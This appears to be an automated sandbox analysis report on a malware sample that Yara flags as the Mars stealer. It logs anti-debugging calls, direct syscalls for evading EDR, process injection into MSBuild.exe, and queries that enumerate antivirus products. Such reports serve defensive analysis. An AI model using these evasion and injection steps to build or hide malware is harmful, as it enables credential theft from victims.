Source: cmd.exe, 00000010.00000002.2301428924.0000000004C2A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: http://www.vmware.com/0/
Source: cmd.exe, 00000010.00000002.2301428924.0000000004C2A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.1
Source: cmd.exe, 00000010.00000002.2301428924.0000000004C2A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.0
Source: R0hb7jyBcv.exe, 00000000.00000003.1841736799.00000000038DB000.00000004.00000020.00020000.00000000.sdmp, u5g0.3.exe, 00000005.00000000.1840725174.000000000041C000.00000020.00000001.01000000.0000000C.sdmp	Binary or memory string: Standard without Hyper-V Core
Source: u5g0.3.exe, 00000005.00000000.1840725174.000000000041C000.00000020.00000001.01000000.0000000C.sdmp	Binary or memory string: VMWARE_VIRTUAL
Source: R0hb7jyBcv.exe, 00000000.00000003.1841736799.00000000038DB000.00000004.00000020.00020000.00000000.sdmp, u5g0.3.exe, 00000005.00000000.1840725174.000000000041C000.00000020.00000001.01000000.0000000C.sdmp	Binary or memory string: Datacenter without Hyper-V Full
Source: R0hb7jyBcv.exe, 00000000.00000003.1841736799.00000000038DB000.00000004.00000020.00020000.00000000.sdmp, u5g0.3.exe, 00000005.00000000.1840725174.000000000041C000.00000020.00000001.01000000.0000000C.sdmp	Binary or memory string: Enterprise without Hyper-V Full
Source: MSBuild.exe, 0000000E.00000002.2921328359.000000000149F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllxx

Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	API call chain: ExitProcess graph end node	graph_1-89094
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	API call chain: ExitProcess graph end node	graph_1-89091
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	API call chain: ExitProcess graph end node	graph_1-90137
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	API call chain: ExitProcess graph end node	graph_1-89120
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	API call chain: ExitProcess graph end node	graph_1-89112
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	API call chain: ExitProcess graph end node	graph_1-89144
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	API call chain: ExitProcess graph end node	graph_1-89104
Source: C:\Users\user\AppData\Local\Temp\u5g0.2\run.exe	API call chain: ExitProcess graph end node

Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\R0hb7jyBcv.exe

Code function: 0_2_00409A73 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00409A73

Source: C:\Users\user\AppData\Local\Temp\u5g0.2\run.exe

Code function: 2_2_00A2D15B VirtualProtect ?,-00000001,00000104,?,?,?,00000000

2_2_00A2D15B

Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe

1_2_00416240

Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Code function: 0_2_004139E7 mov eax, dword ptr fs:[00000030h]	0_2_004139E7
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Code function: 0_2_008EFBDB push dword ptr fs:[00000030h]	0_2_008EFBDB
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Code function: 0_2_024E092B mov eax, dword ptr fs:[00000030h]	0_2_024E092B
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Code function: 0_2_024F3C4E mov eax, dword ptr fs:[00000030h]	0_2_024F3C4E
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Code function: 0_2_024E0D90 mov eax, dword ptr fs:[00000030h]	0_2_024E0D90
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_00415DC0 mov eax, dword ptr fs:[00000030h]	1_2_00415DC0

Source: C:\Users\user\Desktop\R0hb7jyBcv.exe

Code function: 0_2_00420AEA GetProcessHeap,

0_2_00420AEA

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Code function: 0_2_00409A73 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00409A73
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Code function: 0_2_00409C06 SetUnhandledExceptionFilter,	0_2_00409C06
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Code function: 0_2_00409EBE SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00409EBE
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Code function: 0_2_0041073B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0041073B
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Code function: 0_2_024EA125 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_024EA125
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Code function: 0_2_024F09A2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_024F09A2
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Code function: 0_2_024E9E6D SetUnhandledExceptionFilter,	0_2_024E9E6D
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Code function: 0_2_024E9CDA IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_024E9CDA
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_00419DC7 SetUnhandledExceptionFilter,	1_2_00419DC7
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_00417B4E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	1_2_00417B4E
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_004173DD memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_004173DD
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BD3AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_6BD3AC62
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BD3B12A SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	1_2_6BD3B12A
Source: C:\Users\user\AppData\Local\Temp\u5g0.2\run.exe	Code function: 2_2_00A2C1FD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_00A2C1FD
Source: C:\Users\user\AppData\Local\Temp\u5g0.2\run.exe	Code function: 2_2_00A36678 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_00A36678
Source: C:\Users\user\AppData\Local\Temp\u5g0.2\run.exe	Code function: 2_2_6C942782 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_6C942782
Source: C:\Users\user\AppData\Local\Temp\u5g0.2\run.exe	Code function: 2_2_6C9490E9 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_6C9490E9

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Users\user\AppData\Local\Temp\u5g0.2\run.exe	NtSetInformationThread: Direct from: 0x6C85617C	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.2\run.exe	NtSetInformationThread: Direct from: 0x6CEF617C
Source: C:\Users\user\AppData\Local\Temp\u5g0.2\run.exe	NtQuerySystemInformation: Direct from: 0x925BE4
Source: C:\Users\user\AppData\Local\Temp\u5g0.2\run.exe	NtProtectVirtualMemory: Direct from: 0x76EF7B2E	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\AppData\Local\Temp\u5g0.2\run.exe	Section loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe protection: read write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.2\run.exe	Section loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe protection: read write

Searches for specific processes (likely to inject)

Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe

Code function: 1_2_00415D00 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,

1_2_00415D00

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\cmd.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 6A5D1000	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: F7C008	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 6A5D1000
Source: C:\Windows\SysWOW64\cmd.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 535008

Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Process created: C:\Users\user\AppData\Local\Temp\u5g0.0.exe "C:\Users\user\AppData\Local\Temp\u5g0.0.exe"	Jump to behavior
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Process created: C:\Users\user\AppData\Local\Temp\u5g0.2\run.exe "C:\Users\user\AppData\Local\Temp\u5g0.2\run.exe"	Jump to behavior
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Process created: C:\Users\user\AppData\Local\Temp\u5g0.3.exe "C:\Users\user\AppData\Local\Temp\u5g0.3.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\IIIJECAEGD.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.2\run.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.3.exe	Process created: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe "C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.2\run.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\IIIJECAEGD.exe "C:\Users\user\AppData\Local\Temp\IIIJECAEGD.exe"

Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe

Code function: 1_2_6BD84760 malloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetSecurityDescriptorGroup,GetLengthSid,GetLengthSid,GetLengthSid,malloc,InitializeAcl,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,SetSecurityDescriptorDacl,PR_SetError,GetLastError,free,GetLastError,GetLastError,free,free,free,

1_2_6BD84760

Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe

Code function: 1_2_6BC61C30 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLengthSid,malloc,CopySid,CopySid,GetTokenInformation,GetLengthSid,malloc,CopySid,CloseHandle,AllocateAndInitializeSid,GetLastError,PR_LogPrint,

1_2_6BC61C30

Source: R0hb7jyBcv.exe, 00000000.00000003.1841736799.00000000038DB000.00000004.00000020.00020000.00000000.sdmp, u5g0.3.exe, 00000005.00000000.1840725174.000000000041C000.00000020.00000001.01000000.0000000C.sdmp	Binary or memory string: TrayNotifyWndShell_TrayWnd
Source: R0hb7jyBcv.exe, 00000000.00000003.1841736799.00000000038DB000.00000004.00000020.00020000.00000000.sdmp, u5g0.3.exe, 00000005.00000000.1840725174.000000000041C000.00000020.00000001.01000000.0000000C.sdmp	Binary or memory string: Shell_TrayWndtooltips_class32SVWU
Source: R0hb7jyBcv.exe, 00000000.00000003.1841736799.00000000038DB000.00000004.00000020.00020000.00000000.sdmp, u5g0.3.exe, 00000005.00000000.1840725174.000000000041C000.00000020.00000001.01000000.0000000C.sdmp	Binary or memory string: Shell_TrayWndtooltips_class32S

Source: C:\Users\user\Desktop\R0hb7jyBcv.exe

Code function: 0_2_00409D1B cpuid

0_2_00409D1B

Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	0_2_0042086B
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Code function: EnumSystemLocalesW,	0_2_004170F1
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Code function: EnumSystemLocalesW,	0_2_004201F6
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Code function: EnumSystemLocalesW,	0_2_004201AB
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Code function: EnumSystemLocalesW,	0_2_00420291
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	0_2_0042031E
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Code function: GetLocaleInfoW,	0_2_004174E4
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Code function: GetLocaleInfoW,	0_2_0042056E
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_00420697
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	0_2_0041FF33
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Code function: GetLocaleInfoW,	0_2_0042079E
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Code function: GetLocaleInfoW,	0_2_02500A05
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	0_2_02500AD2
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Code function: EnumSystemLocalesW,	0_2_024F7358
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_025008FE
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	0_2_0250019A
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Code function: GetLocaleInfoW,	0_2_024F774B
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Code function: GetLocaleInfoW,	0_2_025007D3
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Code function: GetLocaleInfoW,	0_2_025007D5
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Code function: EnumSystemLocalesW,	0_2_0250045D
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Code function: EnumSystemLocalesW,	0_2_02500412
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Code function: EnumSystemLocalesW,	0_2_025004F8
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,	1_2_00414570

Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\u5g0.3.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate

Jump to behavior

Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u5g0.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u5g0.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u5g0.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u5g0.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u5g0.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u5g0.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u5g0.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u5g0.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u5g0.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u5g0.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u5g0.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u5g0.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u5g0.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u5g0.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u5g0.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u5g0.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u5g0.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Queries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\PresentationFramework-SystemXml\v4.0_4.0.0.0__b77a5c561934e089\PresentationFramework-SystemXml.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\UIAutomationTypes\v4.0_4.0.0.0__31bf3856ad364e35\UIAutomationTypes.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\UIAutomationProvider\v4.0_4.0.0.0__31bf3856ad364e35\UIAutomationProvider.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Queries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Queries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Queries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation

Source: C:\Users\user\Desktop\R0hb7jyBcv.exe

Code function: 0_2_0040996D GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_0040996D

Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe

Code function: 1_2_004143C0 GetProcessHeap,HeapAlloc,GetUserNameA,

1_2_004143C0

Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe

Code function: 1_2_004144B0 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,

1_2_004144B0

Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe

Code function: 1_2_6BC88390 NSS_GetVersion,

1_2_6BC88390

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct

Stealing of Sensitive Information

Yara detected Mars stealer

Source: Yara match	File source: 1.2.u5g0.0.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.u5g0.0.exe.2ed0e67.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.u5g0.0.exe.3020000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.u5g0.0.exe.3020000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.u5g0.0.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.u5g0.0.exe.2ed0e67.1.raw.unpack, type: UNPACKEDPE
